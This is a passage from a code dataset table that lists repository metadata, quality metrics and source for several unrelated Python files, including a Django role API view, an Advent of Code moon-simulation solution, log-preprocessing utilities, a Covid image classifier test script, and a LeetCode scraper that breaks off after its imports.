hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
e9782a8f7459b65fce4ad645e6b56ab9d0f6103d
| 2,144
|
py
|
Python
|
gladier/base.py
|
globus-labs/gladier_tools
|
0dc4a23af81a2355a908b9a9026f0e68a527c6dc
|
[
"Apache-2.0"
] | 1
|
2020-08-25T20:20:18.000Z
|
2020-08-25T20:20:18.000Z
|
gladier/base.py
|
globus-labs/gladier_tools
|
0dc4a23af81a2355a908b9a9026f0e68a527c6dc
|
[
"Apache-2.0"
] | null | null | null |
gladier/base.py
|
globus-labs/gladier_tools
|
0dc4a23af81a2355a908b9a9026f0e68a527c6dc
|
[
"Apache-2.0"
] | null | null | null |
class GladierBaseTool(object):
"""Gladier Defaults defines a common method of tying together
flows, funcx-functions, and default inputs for starting a flow."""
flow_definition = None
flow_input = dict()
required_input = []
alias_exempt = ['funcx_endpoint_compute', 'funcx_endpoint_non_compute']
funcx_endpoints = dict()
funcx_functions = []
def __init__(self, alias=None, alias_class=None):
self.alias = alias
alias_cls = alias_class
if alias and not alias_class:
raise ValueError(
f'{self.__class__.__name__} given alias "{alias}" but not "alias_class". '
'ex: alias_class=gladier.utils.tool_alias.StateSuffixVariablePrefix'
)
if alias_class:
self.alias_renamer = alias_cls(alias)
def get_required_input(self):
if self.alias:
required = []
for input_var in self.required_input:
if input_var not in self.alias_exempt:
required.append(self.alias_renamer.rename_variable(input_var, self))
else:
required.append(input_var)
return required
else:
return self.required_input
def get_flow_input(self):
if not self.alias:
return self.flow_input
flow_input = dict()
for input_var, val in self.flow_input.items():
if input_var not in self.alias_exempt:
flow_input[self.alias_renamer.rename_variable(input_var, self)] = val
else:
flow_input[input_var] = val
return flow_input
def get_original_inputs(self):
return [input_var for input_var in set(self.required_input) | set(self.flow_input.keys())
if input_var not in self.alias_exempt]
def rename_state(self, state_name, state_data):
name = self.alias_renamer.rename_state(state_name, self)
data = self.alias_renamer.rename_input_variables(state_data,
self.get_original_inputs(), self)
return name, data
| 37.614035
| 97
| 0.615672
| 257
| 2,144
| 4.828794
| 0.252918
| 0.087027
| 0.064464
| 0.070911
| 0.183723
| 0.14021
| 0.14021
| 0.14021
| 0
| 0
| 0
| 0
| 0.307369
| 2,144
| 56
| 98
| 38.285714
| 0.83569
| 0.056903
| 0
| 0.152174
| 0
| 0
| 0.09204
| 0.067164
| 0
| 0
| 0
| 0
| 0
| 1
| 0.108696
| false
| 0
| 0
| 0.021739
| 0.391304
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e97c7053b712437ddd9adb3801c6bf654177920e
| 2,717
|
py
|
Python
|
PersonManage/role/views.py
|
ahriknow/ahriknow
|
817b5670c964e01ffe19ed182ce0a7b42e17ce09
|
[
"MIT"
] | null | null | null |
PersonManage/role/views.py
|
ahriknow/ahriknow
|
817b5670c964e01ffe19ed182ce0a7b42e17ce09
|
[
"MIT"
] | 3
|
2021-03-19T01:28:43.000Z
|
2021-04-08T19:57:19.000Z
|
PersonManage/role/views.py
|
ahriknow/ahriknow
|
817b5670c964e01ffe19ed182ce0a7b42e17ce09
|
[
"MIT"
] | null | null | null |
from django.conf import settings
from redis import StrictRedis
from rest_framework.response import Response
from rest_framework.views import APIView
from PersonManage.role.models import Role
from PersonManage.role.serializer import OneRole, ManyRole
from PersonManage.jurisdiction.models import Jurisdiction
class RoleView(APIView):
def get(self, request, id=None):
if id:
if role := Role.objects.filter(pk=id).first():
data = OneRole(instance=role, many=False).data
return Response({'code': 200, 'msg': 'Query was successful!', 'data': data})
return Response({'code': 400, 'msg': 'Data does not exist!', 'data': None})
else:
roles = Role.objects.all()
data = ManyRole(instance=roles, many=True).data
return Response({'code': 200, 'msg': 'Query was successful!', 'data': data})
def post(self, request):
try:
role = Role(name=request.data['name'], describe=request.data['describe'])
role.save()
return Response({'code': 200, 'msg': 'Create successful!', 'data': None})
except Exception as ex:
if 'UNIQUE' in str(ex):
return Response({'code': 400, 'msg': 'Data duplication!', 'data': None})
return Response({'code': 500, 'msg': str(ex), 'data': None})
def put(self, request, id=None):
if role := Role.objects.filter(pk=id).first():
data = request.data
if name := data.get('name'):
role.name = name
if describe := data.get('describe'):
role.describe = describe
if 'jurisdictions' in data:
redis = StrictRedis(host=settings.DATABASES['redis']['HOST'],
port=settings.DATABASES['redis']['PORT'],
db=settings.DATABASES['redis']['NAME_2'],
password=settings.DATABASES['redis']['PASS'])
redis.flushdb()
role.jurisdictions.clear()
for i in data['jurisdictions']:
jur = Jurisdiction.objects.filter(pk=i).first()
role.jurisdictions.add(jur)
role.save()
return Response({'code': 200, 'msg': 'Update successful!', 'data': None})
return Response({'code': 400, 'msg': 'Data does not exist!', 'data': None})
def delete(self, request, id=None):
if role := Role.objects.filter(pk=id).first():
role.delete()
return Response({'code': 200, 'msg': 'Delete successful!'})
return Response({'code': 400, 'msg': 'Data does not exist!', 'data': None})
| 46.844828
| 92
| 0.560177
| 299
| 2,717
| 5.080268
| 0.277592
| 0.092166
| 0.118499
| 0.069124
| 0.368005
| 0.317314
| 0.298881
| 0.256748
| 0.256748
| 0.230415
| 0
| 0.016196
| 0.295547
| 2,717
| 57
| 93
| 47.666667
| 0.777429
| 0
| 0
| 0.192308
| 0
| 0
| 0.137284
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0.019231
| 0.134615
| 0
| 0.423077
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e98066a2b0d3ed3bbd8dc11131cf9f11efdf134a
| 3,645
|
py
|
Python
|
advent-of-code-2019/day 12/main.py
|
gikf/advent-of-code
|
923b026ce87121b73093554734746c2ecb17c5e2
|
[
"MIT"
] | null | null | null |
advent-of-code-2019/day 12/main.py
|
gikf/advent-of-code
|
923b026ce87121b73093554734746c2ecb17c5e2
|
[
"MIT"
] | null | null | null |
advent-of-code-2019/day 12/main.py
|
gikf/advent-of-code
|
923b026ce87121b73093554734746c2ecb17c5e2
|
[
"MIT"
] | null | null | null |
"""Advent of Code 2019 Day 12."""
from functools import lru_cache
import re
def main(file_input='input.txt'):
lines = [line.strip() for line in get_file_contents(file_input)]
moons = parse_moons(lines)
after_steps = simulate_steps(moons, 1000)
total_energy = find_total_energy(after_steps)
print(f'Total energy after 1000 steps: {total_energy}')
cycles = simulate_steps(moons)
*two_cycles, last_cycle = cycles.values()
steps_to_repeat = int(lcm(lcm(*two_cycles), last_cycle))
print(f'Steps to reach first repeating state: {steps_to_repeat}')
def simulate_steps(moons, steps=None):
"""Simulate number steps of moons.
Returns moons after number of steps.
If steps is None returns cycles of moons."""
cycles = {}
initial_moons = moons
step = 0
while not steps or step < steps:
step += 1
moons = moon_motion(moons)
if steps:
continue
for axis in range(3):
if axis in cycles:
continue
if is_cycle(moons, initial_moons, axis):
cycles[axis] = step
if len(cycles) == 3:
return cycles
return moons
def is_cycle(moons, initial, axis):
"""Check if moons cycled at the axis to the initial values."""
for moon, initial in zip(moons, initial):
if (moon['position'][axis] != initial['position'][axis]
or moon['velocity'][axis] != initial['velocity'][axis]):
return False
return True
def moon_motion(initial_moons):
"""Move moons by one step."""
moons = []
for moon in initial_moons:
cur_velocity = moon['velocity']
for other_moon in initial_moons:
if moon == other_moon:
continue
velocity_change = join_with_function(
gravity_effect, moon['position'], other_moon['position'])
cur_velocity = join_with_function(
int.__add__, cur_velocity, velocity_change)
new_position = join_with_function(
int.__add__, moon['position'], cur_velocity)
moons.append({
'position': new_position,
'velocity': cur_velocity,
})
return moons
def join_with_function(func, values1, values2):
"""Join values using func function."""
return [
func(value1, value2)
for value1, value2 in zip(values1, values2)
]
def gravity_effect(position, other_position):
"""Return effect other_position has on position."""
if position == other_position:
return 0
elif position > other_position:
return -1
return 1
def find_total_energy(moons):
"""Get total energy from moons."""
return sum(get_energy(moon['position']) * get_energy(moon['velocity'])
for moon in moons)
def get_energy(values):
"""Get energy from values."""
return sum(abs(value) for value in values)
def parse_moons(lines):
"""Parse lines to dictionary with positions and velocity."""
moons = []
regex = r'([-\d]+)'
for line in lines:
position = [int(num) for num in re.findall(regex, line)]
moons.append({
'position': position,
'velocity': [0, 0, 0]
})
return moons
@lru_cache()
def lcm(a, b):
"""Least common multiple."""
return abs(a * b) / gcd(a, b)
@lru_cache()
def gcd(a, b):
"""Greatest common divisor."""
if b == 0:
return a
return gcd(b, a % b)
def get_file_contents(file):
"""Read all lines from file."""
with open(file) as f:
return f.readlines()
if __name__ == '__main__':
main()
| 27.201493
| 74
| 0.608505
| 465
| 3,645
| 4.589247
| 0.268817
| 0.030928
| 0.029991
| 0.037957
| 0.020619
| 0
| 0
| 0
| 0
| 0
| 0
| 0.012548
| 0.278464
| 3,645
| 133
| 75
| 27.406015
| 0.798859
| 0.131962
| 0
| 0.152174
| 0
| 0
| 0.076575
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.130435
| false
| 0
| 0.021739
| 0
| 0.326087
| 0.021739
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e987a8021b1287256296f2282748c6e9f81dfd63
| 767
|
py
|
Python
|
ntcir15_tools/eval/__init__.py
|
longpham28/ntcir15_tools
|
d5fd138a3c90dfd2c5a67ea908101fed5563484d
|
[
"MIT"
] | null | null | null |
ntcir15_tools/eval/__init__.py
|
longpham28/ntcir15_tools
|
d5fd138a3c90dfd2c5a67ea908101fed5563484d
|
[
"MIT"
] | null | null | null |
ntcir15_tools/eval/__init__.py
|
longpham28/ntcir15_tools
|
d5fd138a3c90dfd2c5a67ea908101fed5563484d
|
[
"MIT"
] | null | null | null |
import numpy as np
from pyNTCIREVAL import Labeler
from pyNTCIREVAL.metrics import MSnDCG
from collections import defaultdict
from ntcir15_tools.data import en_query_ids, ja_query_ids, en_labels, ja_labels
def get_rel_level(text):
if text == "L0":
return 0
if text == "L1":
return 1
if text == "L2":
return 2
return 0
def get_qrels(query_id):
lang = query_id.split("-")[1]
assert query_id in en_query_ids or query_id in ja_query_ids, "not valid query_id"
if lang == "E":
labels = en_labels
else:
labels = ja_labels
temp = labels[labels[:, 0] == query_id]
temp = temp[:, 1:]
result = {}
for col_id, text in temp:
result[col_id] = get_rel_level(text)
return result
| 24.741935
| 85
| 0.647979
| 117
| 767
| 4.025641
| 0.401709
| 0.089172
| 0.042463
| 0.063694
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.021127
| 0.259452
| 767
| 30
| 86
| 25.566667
| 0.808099
| 0
| 0
| 0.076923
| 0
| 0
| 0.033898
| 0
| 0
| 0
| 0
| 0
| 0.038462
| 1
| 0.076923
| false
| 0
| 0.192308
| 0
| 0.461538
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9895372814e45f43f516d5ef779aac132b10fc9
| 2,145
|
py
|
Python
|
notebooks/Detecting Covid-19 through Transfer Learning/src/test.py
|
supria68/Data-Science-Projects
|
423695c130a92db1a188b3d3a13871f0f76f6f5b
|
[
"MIT"
] | 2
|
2020-09-16T19:37:30.000Z
|
2021-11-01T17:49:36.000Z
|
notebooks/Detecting Covid-19 through Transfer Learning/src/test.py
|
supria68/Data-Science-Projects
|
423695c130a92db1a188b3d3a13871f0f76f6f5b
|
[
"MIT"
] | null | null | null |
notebooks/Detecting Covid-19 through Transfer Learning/src/test.py
|
supria68/Data-Science-Projects
|
423695c130a92db1a188b3d3a13871f0f76f6f5b
|
[
"MIT"
] | 1
|
2021-11-01T17:49:37.000Z
|
2021-11-01T17:49:37.000Z
|
"""
filename: test.py
author: Supriya Sudarshan
version: 19.04.2021
description: Takes in the images and predicts (Covid or Non-Covid/Normal) using the *.h5 models
"""
import numpy as np
import matplotlib.pyplot as plt
import os
from tensorflow.keras.models import load_model
from tensorflow.keras.preprocessing import image
from tensorflow.keras.applications.vgg19 import preprocess_input
import random
def evaluate(img_path, model):
"""
Given the image path and model, preprocess the input image and get
predictions
"""
img = image.load_img(img_path, target_size=(224,224))
x = image.img_to_array(img)
x = np.expand_dims(x, axis=0)
image_data = preprocess_input(x)
y_pred = model.predict(image_data)
probability = y_pred[0]
if probability[0] > 0.5:
prediction = str('%.2f' % (probability[0]*100) + '% COVID')
else:
prediction = str('%.2f' % ((1-probability[0])*100) + '% Normal')
plt.title(prediction)
plt.imshow(img)
plt.show()
if __name__ == "__main__":
# Load appropriate models
ct_model = load_model('../saved_models/chest_ct_vggmodel.h5')
xray_model = load_model('../saved_models/chest_xray_vggmodel.h5')
ultrasound_model = load_model('../saved_models/ultrasound_vggmodel.h5')
##### Predictions CT
path = '../images_for_testing/CT'
img = random.choice([x for x in os.listdir(path) if os.path.isfile(os.path.join(path, x))])
print('\nPreparing to predict for a CT image: {}'.format(img))
evaluate(path + '/'+ img, ct_model)
##### Predictions Xray
path = '../images_for_testing/Xray'
img = random.choice([x for x in os.listdir(path) if os.path.isfile(os.path.join(path, x))])
print('\nPreparing to predict for a Xray image: {}'.format(img))
evaluate(path + '/'+ img, xray_model)
##### Predictions Ultrasound
path = '../images_for_testing/Ultrasound'
img = random.choice([x for x in os.listdir(path) if os.path.isfile(os.path.join(path, x))])
print('\nPreparing to predict for a ultrasound image: {}'.format(img))
evaluate(path + '/'+ img, ultrasound_model)
| 32.014925
| 97
| 0.674592
| 303
| 2,145
| 4.627063
| 0.316832
| 0.025678
| 0.040656
| 0.040656
| 0.319544
| 0.301712
| 0.196862
| 0.196862
| 0.196862
| 0.196862
| 0
| 0.020583
| 0.184615
| 2,145
| 66
| 98
| 32.5
| 0.781018
| 0.149184
| 0
| 0.081081
| 0
| 0
| 0.202468
| 0.108805
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027027
| false
| 0
| 0.189189
| 0
| 0.216216
| 0.081081
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e98cb6485313bf23d0ef3116dfc0e309cd633aad
| 3,064
|
py
|
Python
|
preprocess/utils.py
|
federicozaiter/LogClass
|
62c1c9c61294625bdb3d99dc01b6adc7b735c4ab
|
[
"MIT"
] | 159
|
2020-02-19T00:19:23.000Z
|
2022-03-30T08:40:08.000Z
|
preprocess/utils.py
|
WeibinMeng/LogClass-1
|
8edbaf4377374e2aac5e7057987e1d047b83ff2f
|
[
"MIT"
] | 3
|
2021-06-09T04:30:35.000Z
|
2022-01-09T23:26:07.000Z
|
preprocess/utils.py
|
WeibinMeng/LogClass-1
|
8edbaf4377374e2aac5e7057987e1d047b83ff2f
|
[
"MIT"
] | 41
|
2020-02-19T00:19:26.000Z
|
2022-03-28T08:02:22.000Z
|
import re
import numpy as np
from tqdm import tqdm
from ..decorators import print_step
from multiprocessing import Pool
# Compiling for optimization
re_sub_1 = re.compile(r"(:(?=\s))|((?<=\s):)")
re_sub_2 = re.compile(r"(\d+\.)+\d+")
re_sub_3 = re.compile(r"\d{2}:\d{2}:\d{2}")
re_sub_4 = re.compile(r"Mar|Apr|Dec|Jan|Feb|Nov|Oct|May|Jun|Jul|Aug|Sep")
re_sub_5 = re.compile(r":?(\w+:)+")
re_sub_6 = re.compile(r"\.|\(|\)|\<|\>|\/|\-|\=|\[|\]")
p = re.compile(r"[^(A-Za-z)]")
def remove_parameters(msg):
# Removing parameters with Regex
msg = re.sub(re_sub_1, "", msg)
msg = re.sub(re_sub_2, "", msg)
msg = re.sub(re_sub_3, "", msg)
msg = re.sub(re_sub_4, "", msg)
msg = re.sub(re_sub_5, "", msg)
msg = re.sub(re_sub_6, " ", msg)
L = msg.split()
# Filtering strings that have non-letter tokens
new_msg = [k for k in L if not p.search(k)]
msg = " ".join(new_msg)
return msg
def remove_parameters_slower(msg):
# Removing parameters with Regex
msg = re.sub(r"(:(?=\s))|((?<=\s):)", "", msg)
msg = re.sub(r"(\d+\.)+\d+", "", msg)
msg = re.sub(r"\d{2}:\d{2}:\d{2}", "", msg)
msg = re.sub(r"Mar|Apr|Dec|Jan|Feb|Nov|Oct|May|Jun|Jul|Aug|Sep", "", msg)
msg = re.sub(r":?(\w+:)+", "", msg)
msg = re.sub(r"\.|\(|\)|\<|\>|\/|\-|\=|\[|\]", " ", msg)
L = msg.split()
p = re.compile("[^(A-Za-z)]")
# Filtering strings that have non-letter tokens
new_msg = [k for k in L if not p.search(k)]
msg = " ".join(new_msg)
return msg
@print_step
def process_logs(input_source, output, process_line=None):
with open(output, "w", encoding='latin-1') as f:
# counting first to show progress with tqdm
with open(input_source, 'r', encoding='latin-1') as IN:
line_count = sum(1 for line in IN)
with open(input_source, 'r', encoding='latin-1') as IN:
with Pool() as pool:
results = pool.imap(process_line, IN, chunksize=10000)
f.writelines(tqdm(results, total=line_count))
@print_step
def load_logs(params, ignore_unlabeled=False):
log_path = params['logs']
unlabel_label = params['healthy_label']
x_data = []
y_data = []
label_dict = {}
target_names = []
with open(log_path, 'r', encoding='latin-1') as IN:
line_count = sum(1 for line in IN)
with open(log_path, 'r', encoding='latin-1') as IN:
for line in tqdm(IN, total=line_count):
L = line.strip().split()
label = L[0]
if label not in label_dict:
if ignore_unlabeled and label == unlabel_label:
continue
if label == unlabel_label:
label_dict[label] = -1.0
elif label not in label_dict:
label_dict[label] = len(label_dict)
target_names.append(label)
x_data.append(" ".join(L[1:]))
y_data.append(label_dict[label])
x_data = np.array(x_data)
y_data = np.array(y_data)
return x_data, y_data, target_names
| 35.627907
| 77
| 0.568864
| 475
| 3,064
| 3.513684
| 0.244211
| 0.071899
| 0.057519
| 0.065908
| 0.4284
| 0.381067
| 0.318754
| 0.310365
| 0.264829
| 0.264829
| 0
| 0.014731
| 0.246736
| 3,064
| 85
| 78
| 36.047059
| 0.708406
| 0.072454
| 0
| 0.225352
| 0
| 0.028169
| 0.123457
| 0.053616
| 0
| 0
| 0
| 0
| 0
| 1
| 0.056338
| false
| 0
| 0.070423
| 0
| 0.169014
| 0.042254
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e991e9f5f0c1bdfb1e7229e0942eed1c870966c6
| 1,478
|
py
|
Python
|
gfg/trees/sorted_ll_to_bst.py
|
rrwt/daily-coding-challenge
|
b16fc365fd142ebab429e605cb146c8bb0bc97a2
|
[
"MIT"
] | 1
|
2019-04-18T03:29:02.000Z
|
2019-04-18T03:29:02.000Z
|
gfg/trees/sorted_ll_to_bst.py
|
rrwt/daily-coding-challenge
|
b16fc365fd142ebab429e605cb146c8bb0bc97a2
|
[
"MIT"
] | null | null | null |
gfg/trees/sorted_ll_to_bst.py
|
rrwt/daily-coding-challenge
|
b16fc365fd142ebab429e605cb146c8bb0bc97a2
|
[
"MIT"
] | null | null | null |
"""
Given a Singly Linked List which has data members sorted in ascending order.
Construct a Balanced Binary Search Tree which has same data members as the given Linked List.
"""
from typing import Optional
from binary_tree_node import Node # type: ignore
from tree_traversal import inorder # type: ignore
class LLNode:
def __init__(self, data: int):
self.data = data
self.next: Optional[LLNode] = None
def ll_size(head: Optional[LLNode]) -> int:
temp = head
count = 0
while temp:
temp = temp.next
count += 1
return count
def sorted_ll_to_bst(head: Optional[LLNode]) -> Optional[Node]:
def construct(length: int) -> Optional[Node]:
nonlocal head
if head is None or length == 0:
return None
left = construct(length // 2)
root = Node(head.data)
head = head.next
root.left = left
root.right = construct(length - length // 2 - 1)
return root
return construct(ll_size(head))
if __name__ == "__main__":
head = LLNode(1)
head.next = LLNode(2)
head.next.next = LLNode(3)
inorder(sorted_ll_to_bst(head))
print()
head = LLNode(1)
head.next = LLNode(2)
head.next.next = LLNode(3)
head.next.next.next = LLNode(4)
head.next.next.next.next = LLNode(5)
head.next.next.next.next.next = LLNode(6)
head.next.next.next.next.next.next = LLNode(7)
inorder(sorted_ll_to_bst(head))
print()
| 23.460317
| 93
| 0.635995
| 209
| 1,478
| 4.373206
| 0.315789
| 0.140044
| 0.131291
| 0.105033
| 0.278993
| 0.231947
| 0.161926
| 0.098468
| 0.098468
| 0.098468
| 0
| 0.014585
| 0.257781
| 1,478
| 62
| 94
| 23.83871
| 0.818596
| 0.133288
| 0
| 0.243902
| 0
| 0
| 0.006289
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.097561
| false
| 0
| 0.073171
| 0
| 0.292683
| 0.04878
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e9920d3efc1f0f760192d2dad03a56edd3268c51
| 556
|
py
|
Python
|
uvcoverage.py
|
haricash/bayesian-ionized-bubbles
|
c0de5d8ff66f797c72f119b1bc9b11ff8cc63ee6
|
[
"MIT"
] | null | null | null |
uvcoverage.py
|
haricash/bayesian-ionized-bubbles
|
c0de5d8ff66f797c72f119b1bc9b11ff8cc63ee6
|
[
"MIT"
] | null | null | null |
uvcoverage.py
|
haricash/bayesian-ionized-bubbles
|
c0de5d8ff66f797c72f119b1bc9b11ff8cc63ee6
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
from modules.conversions import enu2uvw
data = np.load("uv-array.npy")
e = data[0,:].transpose()
n = data[1,:].transpose()
uvarray = []
for i in range(120):
u,v = enu2uvw( wavelength=1.690,
hour_angle=i/30,
declination=0,
ref_declination=-30,
ref_hour_angle=0,
e=e,
n=n)
# np.save("uv-coverage.npy",u)
uvarray.append((u,v))
np.save("uv-coverage.npy",uvarray)
| 23.166667
| 41
| 0.526978
| 73
| 556
| 3.958904
| 0.534247
| 0.013841
| 0.055363
| 0.110727
| 0.131488
| 0
| 0
| 0
| 0
| 0
| 0
| 0.046196
| 0.33813
| 556
| 24
| 42
| 23.166667
| 0.73913
| 0.05036
| 0
| 0
| 0
| 0
| 0.051233
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.176471
| 0
| 0.176471
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
e99213e148fd6d67da5c28d0d36014f1bdd56a29
| 6,540
|
py
|
Python
|
main.py
|
Bishalsarang/Leetcode-Questions
|
9d0c938778343c073b631884cc38411ea0ac7cd3
|
[
"MIT"
] | 6
|
2021-09-17T12:26:59.000Z
|
2022-03-11T00:37:35.000Z
|
main.py
|
Bishalsarang/Leetcode-Questions
|
9d0c938778343c073b631884cc38411ea0ac7cd3
|
[
"MIT"
] | null | null | null |
main.py
|
Bishalsarang/Leetcode-Questions
|
9d0c938778343c073b631884cc38411ea0ac7cd3
|
[
"MIT"
] | null | null | null |
# Author: Bishal Sarang
import json
import os
import pickle
import time
import bs4
import colorama
import requests
from colorama import Back, Fore
from ebooklib import epub
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.support.ui import WebDriverWait
from utils import *
import epub_writer
# Initialize Colorama
